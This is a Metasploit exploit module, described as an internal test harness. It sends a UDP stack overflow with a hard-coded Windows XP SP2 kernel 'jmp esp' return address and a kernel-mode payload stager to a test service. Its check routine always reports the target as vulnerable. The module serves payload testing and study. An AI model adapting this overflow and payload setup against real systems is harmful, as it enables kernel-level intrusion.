##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# This is an internal test exploit used to exercise kernel-mode payloads
# (stager and recovery options) against a test service; it does not target
# a real product and is kept out of automatic exploit selection.
#
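class MetasploitModule < Msf::Exploit::Remote
  # Manual only: this is a harness for kernel-mode payload testing, not a
  # real-world exploit, so it should never be picked automatically.
  Rank = ManualRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::KernelMode

  # Module metadata. The single target is a fixed kernel-space return
  # address (presumably inside the XP SP2 kernel image), so it only matches
  # the exact build it was taken from.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Internal Kernel-mode Test Exploit',
        'Description' => 'This module tests the exploitation of a kernel-mode test service.',
        'Author' => 'skape',
        'License' => MSF_LICENSE,
        'Arch' => 'x86',
        'Payload' => {
          'Space' => 1000,
          'MaxNops' => 0,
          # Both prepends move esp downwards before the payload/encoder run,
          # away from the stack region the overflow has just clobbered. The
          # immediates are negative: 0xfffff254 == -3500, 0xfffffe0c == -500.
          'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
          'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
        },
        'Targets' => [
          [
            'Windows XP SP2',
            {
              'Ret' => 0x80502d7f, # jmp esp (kernel-space, build-specific)
              'Platform' => 'win',
              'Payload' =>
                {
                  # Kernel-mode specifics handed to the payload generator:
                  # how to get back to user mode and how to recover afterwards.
                  'ExtendedOptions' =>
                    {
                      'Stager' => 'sud_syscall_hook',
                      'Recovery' => 'spin'
                    }
                }
            }
          ],
        ],
        'DefaultTarget' => 0
      )
    )
  end

  # Exclude this module from automated exploit selection: it only speaks to
  # the internal test service.
  def autofilter
    false
  end

  # Always reports Vulnerable. There is nothing to probe on a test service;
  # do not copy this pattern into a module that targets real software.
  def check
    Exploit::CheckCode::Vulnerable
  end

  # Build the overflow datagram and send it over UDP.
  #
  # Layout, from the start of the overflowed buffer:
  #   260 bytes of filler, a fixed 0x00007fbe dword, 28 bytes of filler,
  #   the target return address (jmp esp), 8 bytes of filler, then the
  #   encoded payload. The marker value and the two gap sizes are dictated
  #   by the test service's frame layout (assumed; not derivable from here).
  #
  # The socket is always released, even if building or sending the buffer
  # raises.
  def exploit
    connect_udp

    begin
      # Take the encoded payload once so the length we report is the length
      # we actually send.
      encoded = payload.encoded
      print_status("Sending #{encoded.length} byte payload...")

      buf =
        rand_text_alphanumeric(260) +
        "\xbe\x7f\x00\x00" +
        rand_text_alphanumeric(28) +
        [target.ret].pack('V') +
        rand_text_alphanumeric(8) +
        encoded

      udp_sock.put(buf)

      # UDP gives no acknowledgement; pause briefly so the datagram is out
      # before the socket is torn down.
      select(nil, nil, nil, 2)
    ensure
      disconnect_udp
    end
  end

end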
